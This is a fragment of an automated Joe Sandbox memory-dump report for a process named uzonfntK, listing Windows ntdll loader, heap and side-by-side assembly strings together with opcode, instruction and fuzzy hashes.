                                                                    • Opcode ID: 47ade21600e1aefef2b31c72b2c4fc599948dc9f8d4f26ece73d932d73635358
                                                                    • Instruction ID: e06a82f1062e10ef2515a0f3da2743958b13c2cff21cdcda74b34af46b374b0c
                                                                    • Opcode Fuzzy Hash: 47ade21600e1aefef2b31c72b2c4fc599948dc9f8d4f26ece73d932d73635358
                                                                    • Instruction Fuzzy Hash: 0D0250F1D0122C9BEB25CB18CD90B9DB7B8AF58314F4055EAA608A7241EB309FC5CF59
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                    • API String ID: 0-2515994595
                                                                    • Opcode ID: 800aaf4f8da6255553599e7261c2707c99cc1cd233854e3ca4a7c28f82bbd9bf
                                                                    • Instruction ID: df6702565d884c20a9bb9f95c9293f005bb6d5e4e9060e7f593fab6264c0ae00
                                                                    • Opcode Fuzzy Hash: 800aaf4f8da6255553599e7261c2707c99cc1cd233854e3ca4a7c28f82bbd9bf
                                                                    • Instruction Fuzzy Hash: 53519F715053599BC329CF1888D4BEBB7FDEF94260F204E2EAD9883241E770D646C79A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                    • API String ID: 0-3197712848
                                                                    • Opcode ID: 932b847e99d9d36308fc9596216155fc34b0a8b447f0f478434caff42d873d43
                                                                    • Instruction ID: d33018c3212951637dc7011583ecffa5af5dc1e0259a1c9fb25a46399d378bae
                                                                    • Opcode Fuzzy Hash: 932b847e99d9d36308fc9596216155fc34b0a8b447f0f478434caff42d873d43
                                                                    • Instruction Fuzzy Hash: 381236B1A0A385DFD324CF24C480BAAB3E6FF94704F44496EF9889B291E734D955C792
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                    • API String ID: 0-1357697941
                                                                    • Opcode ID: 57b3b989713db2b6efa0ab9be96160e205024d12277f9014d29d538630145ea4
                                                                    • Instruction ID: ec3091cb20956788ec7a40ff22f63f9d62a0bac70fbe10f5eda29f4e5506d1a4
                                                                    • Opcode Fuzzy Hash: 57b3b989713db2b6efa0ab9be96160e205024d12277f9014d29d538630145ea4
                                                                    • Instruction Fuzzy Hash: 8DF12435B0524AEFCB19CF64C480FEAB7F6FF09354F048969E5859BA42D730AA46CB50
                                                                    Strings
                                                                    • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 29042881
                                                                    • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 290429B1
                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2904292E
                                                                    • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 29042856
                                                                    • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 290429AC
                                                                    • @, xrefs: 29003180
                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 290428B2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                    Strings
                                                                    • VerifierFlags, xrefs: 29058C50
                                                                    • AVRF: -*- final list of providers -*- , xrefs: 29058B8F
                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 29058A3D
                                                                    • VerifierDlls, xrefs: 29058CBD
                                                                    • VerifierDebug, xrefs: 29058CA5
                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 29058A67
                                                                    • HandleTraces, xrefs: 29058C8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                    Strings
                                                                    • LdrpGenericExceptionFilter, xrefs: 29054DFC
                                                                    • Execute '.cxr %p' to dump context, xrefs: 29054EB1
                                                                    • ***Exception thrown within loader***, xrefs: 29054E27
                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 29054E38
                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 29054E06
                                                                    • LdrpProtectedCopyMemory, xrefs: 29054DF4
                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 29054DF5
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                    Strings
                                                                    • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 2904279C
                                                                    • \WinSxS\, xrefs: 29002E23
                                                                    • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 2904276F
                                                                    • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 29042706
                                                                    • .Local\, xrefs: 29002D91
                                                                    • @, xrefs: 29002E4D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                    APIs
                                                                      • Part of subcall function 29012DF0: LdrInitializeThunk.NTDLL ref: 29012DFA
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29010BA3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29010BB6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29010D60
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29010D74
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                    • String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                    Strings
                                                                    • HEAP: , xrefs: 290354E0, 290355A1
                                                                    • HEAP[%wZ]: , xrefs: 290354D1, 29035592
                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 290355AE
                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 290354ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                    Strings
                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 29043456
                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 29043437
                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 2904342A
                                                                    • RtlDeactivateActivationContext, xrefs: 29043425, 29043432, 29043451
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                    Strings
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 2904362F
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 2904365C
                                                                    • LdrpFindDllActivationContext, xrefs: 29043636, 29043662
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 29043640, 2904366C
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    Strings
                                                                    • HEAP: , xrefs: 28FE3264
                                                                    • HEAP[%wZ]: , xrefs: 28FE3255
                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 28FE327D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $@
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 2903A121
                                                                    • Failed to allocated memory for shimmed module list, xrefs: 2903A10F
                                                                    • LdrpCheckModule, xrefs: 2903A117
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-161242083
                                                                    • Opcode ID: e3c497d35b17617b8380d287206e25ae2c69e6345534e45e366b82216dc27e4b
                                                                    • Instruction ID: a66125d9001edc7ef0024b4eeb7b7b65a94205ddb671cbadf2df18e4c7c9e68a
                                                                    • Opcode Fuzzy Hash: e3c497d35b17617b8380d287206e25ae2c69e6345534e45e366b82216dc27e4b
                                                                    • Instruction Fuzzy Hash: AC711675A01209EFCB18DFA8C980AAEB7F5EFA8304F54443DD905E7661E734AE42CB54
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-1334570610
                                                                    • Opcode ID: cb1fe97c6e58beef4066e0029b4643a10fa7f41562e7af3c2a8c3bec38e714be
                                                                    • Instruction ID: 3d1bdb68c144412d73d6d81bfaa04140256902e06364a231553c1b5365e7742e
                                                                    • Opcode Fuzzy Hash: cb1fe97c6e58beef4066e0029b4643a10fa7f41562e7af3c2a8c3bec38e714be
                                                                    • Instruction Fuzzy Hash: E061BE71601349EFD718CF24C480B5ABBE2FF85704F14896AE899CF692D770E982CB95
                                                                    Strings
                                                                    • InstallLanguageFallback, xrefs: 28FCCD7F
                                                                    • @, xrefs: 28FCCD63
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 28FCCD34
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                    • API String ID: 0-1757540487
                                                                    • Opcode ID: 3c1bf8ce1d265706844e6a98eea6cb3f4ac2f49c70fc318f6e596da164917801
                                                                    • Instruction ID: 6be04a64bc4e9a6ef641465bcc90369385789f46e9c573817965c4e04ad6d16b
                                                                    • Opcode Fuzzy Hash: 3c1bf8ce1d265706844e6a98eea6cb3f4ac2f49c70fc318f6e596da164917801
                                                                    • Instruction Fuzzy Hash: 1D5105B690534A9BD718CF25C454B6BB3E9BF88714F000D7EFA84D7290EB30DA058762
                                                                    Strings
                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 2908C1C5
                                                                    • PreferredUILanguages, xrefs: 2908C212
                                                                    • @, xrefs: 2908C1F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                    • API String ID: 0-2968386058
                                                                    • Opcode ID: d665dcfbc16d0a694fd3214d7bd8ed4fba124f7d6712c361bdac846f5fc77565
                                                                    • Instruction ID: 0f47b1ad7f8a299102d07bb2eb1f99b806b3585912b383b608b8a182e4378161
                                                                    • Opcode Fuzzy Hash: d665dcfbc16d0a694fd3214d7bd8ed4fba124f7d6712c361bdac846f5fc77565
                                                                    • Instruction Fuzzy Hash: D8415E72A0222DEBDB05CBD4C881FDEB7F9BF14750F10857AEA05A7280E7749A468B50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                    • API String ID: 0-1373925480
                                                                    • Opcode ID: 85696db1628a5f6347435d77c84fc81887ec9ebf65444ae79bce2f0cda741796
                                                                    • Instruction ID: b51e2bcdd7c55aeb5796111607cdaeee1f990be88f4ba8e1baab763f37ded575
                                                                    • Opcode Fuzzy Hash: 85696db1628a5f6347435d77c84fc81887ec9ebf65444ae79bce2f0cda741796
                                                                    • Instruction Fuzzy Hash: 9F41F33190564C8BEB19CB95C840B9DBBF9FF55380F24086AD949EF7A5EB349942CB10
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                    • API String ID: 0-2558761708
                                                                    • Opcode ID: 4b63ea819276ef82011ba1053d82a3bb7e4fd58c88cffc9235b6e5a9b6a81ad7
                                                                    • Instruction ID: 93ed2c6d240784b3f4785f09669655b6fd1371407d9b9a8630fb4b674b7cd880
                                                                    • Opcode Fuzzy Hash: 4b63ea819276ef82011ba1053d82a3bb7e4fd58c88cffc9235b6e5a9b6a81ad7
                                                                    • Instruction Fuzzy Hash: 2F11DF3131A049DFD71CC714C880F1EB3A6FF80629F14856AE80DCBA61DB30D842CB55
                                                                    Strings
                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 29052104
                                                                    • Process initialization failed with status 0x%08lx, xrefs: 290520F3
                                                                    • LdrpInitializationFailure, xrefs: 290520FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                    • API String ID: 0-2986994758
                                                                    • Opcode ID: 250b322e73404bdb7bdae71ea8408fb52e7364859dc073abb70d6324ab7e8d87
                                                                    • Instruction ID: f4b79056a650c920eaaa43ce8642ba3e5a1b62932526d8d4c509dbb1096202cd
                                                                    • Opcode Fuzzy Hash: 250b322e73404bdb7bdae71ea8408fb52e7364859dc073abb70d6324ab7e8d87
                                                                    • Instruction Fuzzy Hash: B9F0FF3060124CBBDA14E708DC82F9A37ADEB58B54F100825F605AB281D2B4EA41CA94
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: #%u
                                                                    • API String ID: 48624451-232158463
                                                                    • Opcode ID: 589017126d28b77e757f578e3186174f35ecd410b21b5b8e25bd4519f9211061
                                                                    • Instruction ID: c4099f4cdba15bee75e3b53327f68b0268e02e1aeaebcb04c00820af12b69497
                                                                    • Opcode Fuzzy Hash: 589017126d28b77e757f578e3186174f35ecd410b21b5b8e25bd4519f9211061
                                                                    • Instruction Fuzzy Hash: 0B715A71A0114DAFCB05CFA8C990FAEB7F9BF48304F144465E909EB251EA34EE02CB60
                                                                    APIs
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 2905CFBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8
                                                                    • String ID: @
                                                                    • API String ID: 4062629308-2766056989
                                                                    • Opcode ID: 4c4d126c3e22244be119f3183f8864503d2d9d89e42b02ff5b49ae7550d93697
                                                                    • Instruction ID: b7507a35438c9ba57b9e91375e5e4d473ba18ed4b2f24ae4f6a1c2c2fcd1d025
                                                                    • Opcode Fuzzy Hash: 4c4d126c3e22244be119f3183f8864503d2d9d89e42b02ff5b49ae7550d93697
                                                                    • Instruction Fuzzy Hash: BD418F7590125CEFCB258FA5D880AAEBBF8FF54710F00492AE905DB254E734D942CBA5
                                                                    Strings
                                                                    • LdrResSearchResource Exit, xrefs: 28FDAA25
                                                                    • LdrResSearchResource Enter, xrefs: 28FDAA13
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                    • API String ID: 0-4066393604
                                                                    • Opcode ID: bdb37cd2e3ba463b6b0a66fbf6715fe1369eef6e90bf142ed60c17165c2b9b6c
                                                                    • Instruction ID: d4d2386fb997cfaf35aabc49845579299271d41046c0184cd89ad2299ff39ea9
                                                                    • Opcode Fuzzy Hash: bdb37cd2e3ba463b6b0a66fbf6715fe1369eef6e90bf142ed60c17165c2b9b6c
                                                                    • Instruction Fuzzy Hash: 5EE19072E02308EFDB15CF99C980B9EB7BAAF48350F584526EE00E7251D774CA52CB58
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction ID: b5f6f9142cca0d5b33027dcdc49be2f167e18ff8dfc8be54908c42f15738a9ca
                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                    • Instruction Fuzzy Hash: 4AC1D0312243499BE718CF26C841B2BBBE5AFC4B58F048E2DF695CB290D774D546EB81
                                                                    Strings
                                                                    • , xrefs: 290732B8
                                                                    • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 29073011
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                    • API String ID: 0-4088147954
                                                                    • Opcode ID: d02380c42abe59fd26cf113000358ae4353812583fae7af8f42f2a70a691b863
                                                                    • Instruction ID: c3f46f022829753e9cc567a9c556652bf9f60c53d0ca03dd7cd92d4ab5a69cb2
                                                                    • Opcode Fuzzy Hash: d02380c42abe59fd26cf113000358ae4353812583fae7af8f42f2a70a691b863
                                                                    • Instruction Fuzzy Hash: 99C1DD716483499BE718CF14D880B9FB7F9AF98764F008D2EFA848B240E771D946C796
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Lm)$Lm)
